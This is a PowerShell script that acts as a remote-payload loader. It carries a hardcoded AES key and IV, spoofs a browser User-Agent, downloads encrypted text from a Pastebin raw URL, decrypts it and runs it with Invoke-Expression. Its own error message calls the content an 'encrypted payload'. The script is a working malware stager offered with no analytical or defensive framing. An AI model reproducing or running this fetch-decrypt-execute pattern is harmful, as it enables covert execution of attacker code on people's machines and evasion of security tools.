function D {
    param($e, $k, $i)
    $a = [System.Security.Cryptography.Aes]::Create()
    $a.Key = $k
    $a.IV = $i
    $a.Padding = "PKCS7"
    $d = $a.CreateDecryptor()
    $b = [Convert]::FromBase64String($e)
    $m = New-Object IO.MemoryStream
    $c = New-Object Security.Cryptography.CryptoStream($m, $d, 'Write')
    $c.Write($b, 0, $b.Length)
    $c.Close()
    [Text.Encoding]::UTF8.GetString($m.ToArray())
}

$k = [Convert]::FromBase64String("Q3K1OxDixc03IRcJusRx7mbJX15GuNORMw2PuFevUfA=")
$i = [Convert]::FromBase64String("kXHMQaoW9ayabOL5BKBI3w==")

try {
    $headers = @{ "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" }
    $raw = Invoke-WebRequest -Uri "https://pastebin.com/raw/nA98KEqw" -UseBasicParsing -Headers $headers
    $p = $raw.Content -replace '[^a-zA-Z0-9+/=]', ''
    iex (D $p $k $i)
} catch {
    Write-Error "[-] Failed to fetch or execute encrypted payload: $_"
}
